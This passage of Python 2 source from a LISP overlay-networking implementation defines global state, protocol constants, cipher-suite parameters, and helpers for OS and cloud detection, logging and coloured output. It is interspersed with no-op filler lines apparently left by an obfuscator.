# map-resolvers, RTRs, and the ELP/RLE/geo/JSON named-object stores.
#
lisp_map_notify_queue = {}
lisp_map_servers_list = {}
lisp_ddt_map_requestQ = {}
lisp_db_list = []
lisp_group_mapping_list = {}
lisp_map_resolvers_list = {}
lisp_rtr_list = {}
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}

# Local RLOCs ([IPv4, IPv6, MAC] slots) and local MAC address table.
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}

#
# Interface state: name -> interface object, instance-ID -> interface,
# and the list of multi-tenant interfaces.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []

# Periodic timers (created lazily by the component that needs them).
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None

# Count of EID-prefixes this ETR has registered.
lisp_registered_count = 0

# Info-Request sources (NAT traversal), indexed two ways.
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}

#
# LISP-crypto key state: keys negotiated but not yet confirmed (by nonce)
# and confirmed keys per RLOC for each direction.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
lisp_data_plane_security = False
lisp_search_decap_keys = True

# Logging switches for the data plane, frame dumps, and flow logging.
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False

# Ephemeral source port used for lisp-crypto key exchange.
lisp_crypto_ephem_port = None

# True when acting as a proxy-ITR.
lisp_pitr = False

# True when running a layer-2 (MAC EID) overlay.
lisp_l2_overlay = False

# RLOC-probing state: enabled flag and probe bookkeeping per RLOC.
lisp_rloc_probing = False
lisp_rloc_probe_list = {}

# When False, register only reachable RTRs (NAT traversal).
lisp_register_all_rtrs = True

# Nonce-echoing state (draft-ietf-lisp-rfc6830bis echo-nonce).
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}

# True when NAT traversal is configured.
lisp_nat_traversal = False

# True when a hardware data plane is programmed.
lisp_program_hardware = False

# Map-cache checkpointing to survive restarts.
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"

# IPC channel to an external data plane process.
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"

# Lock serializing IPC sends (created by the component at startup).
lisp_ipc_lock = None

# Default instance-IDs used when none is configured.
lisp_default_iid = 0
lisp_default_secondary_iid = 0

# RTRs learned by the map-server.
lisp_ms_rtr_list = []

# Per-EID NAT state (translated addresses/ports).
lisp_nat_state_info = {}

# Rate-limiting state: last Map-Request and last ICMP too-big sent.
lisp_last_map_request_sent = None
lisp_last_icmp_too_big_sent = 0

# Bounded in-memory flow log.
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []

# Configured policy entries by name.
lisp_policies = {}

# When True, hash ping/traceroute flows across multiple RLOCs.
lisp_load_split_pings = False

# Configured EID hash-prefixes (crypto-EIDs).
lisp_eid_hashes = []

# IPv4 fragment reassembly queue, keyed by (source, ident).
lisp_reassembly_queue = {}

# Map-Request subscription (pub/sub) state.
lisp_pubsub_cache = {}

# LISP-Decent (distributed mapping system) configuration.
lisp_decent_push_configured = False
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None

# IPC socket to the lisp-core process.
lisp_ipc_socket = None

# Map-server encryption keys by key-id.
lisp_ms_encryption_keys = {}

# RTR cache of LISP-Trace requests seen through NATs.
lisp_rtr_nat_trace_cache = {}

# Gleaned mappings (learned from data packets) and gleaned groups.
lisp_glean_mappings = []
lisp_gleaned_groups = {}

#
# Raw ICMP socket used to send "packet too big" messages; only opened when
# explicitly requested via environment variable (requires root).
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
    lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_ICMP)
    lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)

lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)

#
# Well-known UDP ports (RFC 6830 and related encapsulations).
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434

#
# LISP control-message type codes.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9

#
# Map-Reply action codes and their display strings (indexed by action).
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5

lisp_map_reply_action_string = ["no-action", "native-forward",
    "send-map-request", "drop-action", "policy-denied", "auth-failure"]

#
# Map-Register authentication algorithm IDs and digest lengths.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32

#
# LCAF (LISP Canonical Address Format) type codes.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16

#
# TTL values in minutes placed in Map-Replies/Map-Registers.
#
LISP_MR_TTL = (24 * 60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240

#
# Periodic timer intervals and retry limits, in seconds unless noted.
#
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = 5
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1

LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15

LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180

#
# LISP-crypto cipher-suite IDs with Diffie-Hellman group parameters
# (generator G and prime modulus P) for the DH-based suites.
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3

LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF

LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6

# Bit masks for 32-, 64-, and 128-bit truncation.
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
def lisp_record_traceback(*args):
    """Uncaught-exception hook (installed by lisp_set_exception): append the
    most recent traceback to ./logs/lisp-traceback.log and echo it to stdout.
    """
    timestamp = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
    log = open("./logs/lisp-traceback.log", "a")
    log.write("---------- Exception occurred: {} ----------\n".format(timestamp))

    # print_last() raises if no traceback is pending; record that instead.
    try:
        traceback.print_last(file=log)
    except:
        log.write("traceback.print_last(file=fd) failed")

    # Echo to stdout (the component logfile) as well, best-effort.
    try:
        traceback.print_last()
    except:
        print("traceback.print_last() failed")

    log.close()
    return
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
if 28 - 28: I11i
if 58 - 58: OoOoOO00
if 37 - 37: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i
if 73 - 73: i11iIiiIii - IiII
if 25 - 25: OoooooooOO + IiII * I1ii11iIi11i
def lisp_set_exception ( ) :
    """Install lisp_record_traceback as the process-wide handler for
    uncaught exceptions, so crashes land in lisp-traceback.log."""
    sys . excepthook = lisp_record_traceback
    return
if 92 - 92: I1IiiI + I11i + O0 / o0oOOo0O0Ooo + I1Ii111
if 18 - 18: ooOoO0o * OoOoOO00 . iII111i / I1ii11iIi11i / i11iIiiIii
if 21 - 21: oO0o / I1ii11iIi11i + Ii1I + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + iII111i + ooOoO0o * i11iIiiIii
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + I11i * I1Ii111 . IiII
if 52 - 52: ooOoO0o + O0 . iII111i . I1ii11iIi11i . OoO0O00
if 97 - 97: I1IiiI / iII111i
def lisp_is_raspbian ( ) :
    """Return True when running Raspbian: a Debian distribution on ARM."""
    # NOTE(review): platform.dist() was deprecated in Python 3.5 and removed
    # in 3.8; this codebase runs under Python 2 where it is still available.
    if ( platform . dist ( ) [ 0 ] != "debian" ) : return ( False )
    return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 71 - 71: II111iiii / i1IIi . I1ii11iIi11i % OoooooooOO . OoOoOO00
if 41 - 41: i1IIi * II111iiii / OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
def lisp_is_ubuntu ( ) :
    """Return True when the host Linux distribution is Ubuntu."""
    # NOTE(review): platform.dist() was removed in Python 3.8; Python 2 only.
    return ( platform . dist ( ) [ 0 ] == "Ubuntu" )
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
def lisp_is_fedora ( ) :
    """Return True when the host Linux distribution is Fedora."""
    # NOTE(review): platform.dist() was removed in Python 3.8; Python 2 only.
    return ( platform . dist ( ) [ 0 ] == "fedora" )
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
def lisp_is_centos ( ) :
    """Return True when the host Linux distribution is CentOS."""
    # NOTE(review): platform.dist() was removed in Python 3.8; Python 2 only.
    return ( platform . dist ( ) [ 0 ] == "centos" )
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
def lisp_is_debian ( ) :
    """Return True when the host Linux distribution is Debian."""
    # NOTE(review): platform.dist() was removed in Python 3.8; Python 2 only.
    return ( platform . dist ( ) [ 0 ] == "debian" )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def lisp_is_debian_kali ( ) :
    """Return True when the host Linux distribution is Kali (Debian family)."""
    # NOTE(review): platform.dist() was removed in Python 3.8; Python 2 only.
    return ( platform . dist ( ) [ 0 ] == "Kali" )
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
def lisp_is_macos():
    """Return True when running on a Darwin (macOS) kernel."""
    return platform.uname()[0] == "Darwin"
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
def lisp_is_alpine():
    """Return True when running on Alpine Linux, detected via its
    distribution marker file /etc/alpine-release."""
    return os.path.exists("/etc/alpine-release")
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
def lisp_is_x86():
    """Return True when the CPU architecture is 32- or 64-bit x86."""
    return platform.machine() in ("x86", "i686", "x86_64")
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def lisp_is_linux():
    """Return True when running on a Linux kernel."""
    return platform.uname()[0] == "Linux"
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
if 86 - 86: i1IIi
if 41 - 41: OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
def lisp_on_aws():
    """Return True when this host is an AWS instance, detected by the BIOS
    vendor string containing "amazon"."""
    bios = commands.getoutput("sudo dmidecode -s bios-version")

    # Inside a docker container dmidecode may be missing; log that case.
    if ("command not found" in bios and lisp_on_docker()):
        banner = bold("AWS check", False)
        lprint("{} - dmidecode not installed in docker container".format(banner))

    return ("amazon" in bios.lower())
if 5 - 5: OOooOOo - OOooOOo . Oo0Ooo + OoOoOO00 - OOooOOo . oO0o
if 31 - 31: II111iiii - iIii1I11I1II1 - iIii1I11I1II1 % I11i
if 12 - 12: iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
def lisp_on_gcp():
    """Return True when this host is a Google Cloud instance, detected by
    the BIOS vendor string containing "google"."""
    bios = commands.getoutput("sudo dmidecode -s bios-version")
    return ("google" in bios.lower())
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
def lisp_on_docker():
    """Return True when running inside a Docker container, detected via the
    /.dockerenv marker file Docker creates in the container root."""
    return os.path.exists("/.dockerenv")
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
def lisp_process_logfile():
    """Ensure stdout points at this component's logfile. No-op while
    ./logs/lisp-<id>.log still exists; after external rotation removes it,
    reopen the file, repoint stdout, and print a rotation banner."""
    log_path = "./logs/lisp-{}.log".format(lisp_log_id)
    if os.path.exists(log_path): return

    # Logfile was rotated away: reopen it and announce the rotation.
    sys.stdout.close()
    sys.stdout = open(log_path, "a")
    lisp_print_banner(bold("logfile rotation", False))
    return
if 35 - 35: II111iiii * I11i - OoooooooOO . I11i . I11i
if 11 - 11: I1Ii111 / OoOoOO00 + I11i % iIii1I11I1II1
if 42 - 42: I1ii11iIi11i * OoOoOO00 % ooOoO0o - OoOoOO00 . i11iIiiIii - I1Ii111
if 84 - 84: I1Ii111 - I1ii11iIi11i / I11i
if 13 - 13: IiII - Oo0Ooo - ooOoO0o
if 92 - 92: ooOoO0o / OoOoOO00 * OoO0O00 . I11i % II111iiii
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
def lisp_i_am(name):
    """Record which LISP component role this process plays ("itr", "etr",
    "rtr", "mr", "ms", "ddt", or "core"): set the matching lisp_i_am_* flag,
    the log identifier, and the short hostname used in log banners."""
    global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
    global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
    global lisp_hostname

    lisp_log_id = name
    if name == "itr":
        lisp_i_am_itr = True
    elif name == "etr":
        lisp_i_am_etr = True
    elif name == "rtr":
        lisp_i_am_rtr = True
    elif name == "mr":
        lisp_i_am_mr = True
    elif name == "ms":
        lisp_i_am_ms = True
    elif name == "ddt":
        lisp_i_am_ddt = True
    elif name == "core":
        lisp_i_am_core = True

    # Keep only the first label of the hostname for compact log lines.
    lisp_hostname = socket.gethostname().split(".")[0]
    return
if 94 - 94: OoOoOO00 - Oo0Ooo - I1IiiI % i1IIi
if 19 - 19: o0oOOo0O0Ooo
if 42 - 42: i1IIi . I1IiiI / i1IIi + Ii1I
if 54 - 54: ooOoO0o % OOooOOo . I1Ii111 + oO0o - OOooOOo * I1IiiI
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
def lprint ( * args ) :
    """Main logging primitive: print *args* to the component logfile with a
    millisecond timestamp and log-id prefix. The sentinel string "force"
    anywhere in args logs even when lisp_debug_logging is off (the sentinel
    itself is not printed)."""
    O0O0o0o0o = ( "force" in args )
    if ( lisp_debug_logging == False and O0O0o0o0o == False ) : return
    if 9 - 9: Oo0Ooo + OoOoOO00 - iIii1I11I1II1 - Ii1I + o0oOOo0O0Ooo
    # Reopen the logfile if it was rotated away since the last write.
    lisp_process_logfile ( )
    # Timestamp trimmed from microsecond to millisecond precision.
    Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
    Oo0OO0000oooo = Oo0OO0000oooo [ : - 3 ]
    # Python 2 trailing-comma prints: args are space-separated on one line.
    print "{}: {}:" . format ( Oo0OO0000oooo , lisp_log_id ) ,
    if 97 - 97: OOooOOo
    for OO0OOooOO0 in args :
        if ( OO0OOooOO0 == "force" ) : continue
        print OO0OOooOO0 ,
    if 31 - 31: I1IiiI * oO0o + OoooooooOO - iII111i / OoooooooOO
    print ""
    if 19 - 19: IiII * ooOoO0o * o0oOOo0O0Ooo + O0 / O0
    # Flush so log lines appear promptly; ignore failures on a closed stream.
    try : sys . stdout . flush ( )
    except : pass
    return
if 73 - 73: iIii1I11I1II1 / iIii1I11I1II1 - oO0o
if 91 - 91: oO0o + I1IiiI
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
def dprint(*args):
    """Data-plane logging: forward *args* to lprint() only when
    lisp_data_plane_logging is enabled."""
    if not lisp_data_plane_logging: return
    lprint(*args)
    return
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
def debug ( * args ) :
    """Temporary debug print: emit *args* to the component logfile wrapped
    in red >>> / <<< markers so ad-hoc output stands out from lprint()."""
    lisp_process_logfile ( )
    if 63 - 63: I1ii11iIi11i
    # Timestamp trimmed from microsecond to millisecond precision.
    Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
    Oo0OO0000oooo = Oo0OO0000oooo [ : - 3 ]
    if 6 - 6: ooOoO0o / I1ii11iIi11i
    # Python 2 trailing-comma prints keep everything on one line.
    print red ( ">>>" , False ) ,
    print "{}:" . format ( Oo0OO0000oooo ) ,
    for OO0OOooOO0 in args : print OO0OOooOO0 ,
    print red ( "<<<\n" , False )
    # Flush so the marker shows immediately; ignore a closed stream.
    try : sys . stdout . flush ( )
    except : pass
    return
if 57 - 57: I11i
if 67 - 67: OoO0O00 . ooOoO0o
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
if 35 - 35: i1IIi - iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
def lisp_print_banner(string):
    """Log the standard lispers.net banner line (event name, date, software
    version, bolded hostname), loading the version string on first use."""
    global lisp_version, lisp_hostname

    if lisp_version == "":
        lisp_version = commands.getoutput("cat lisp-version.txt")

    host = bold(lisp_hostname, False)
    lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
        datetime.datetime.now(), lisp_version, host))
    return
if 71 - 71: iIii1I11I1II1 - OOooOOo . I1IiiI % OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
def green(string, html):
    """Render 'string' in green: HTML font markup when 'html' is true,
    otherwise an ANSI escape sequence wrapped in bold()."""
    if html:
        return '<font color="green"><b>{}</b></font>'.format(string)
    return bold("\033[92m" + string + "\033[0m", html)
if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
def green_last_sec(string):
    """HTML-green highlight used for entries active within the last second."""
    return green(string, True)
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
def green_last_min(string):
    """HTML light-green (#58D68D) highlight used for entries active
    within the last minute."""
    return '<font color="#58D68D"><b>{}</b></font>'.format(string)
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
def red(string, html):
    """Render 'string' in red: HTML font markup when 'html' is true,
    otherwise an ANSI escape sequence wrapped in bold()."""
    if html:
        return '<font color="red"><b>{}</b></font>'.format(string)
    return bold("\033[91m" + string + "\033[0m", html)
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
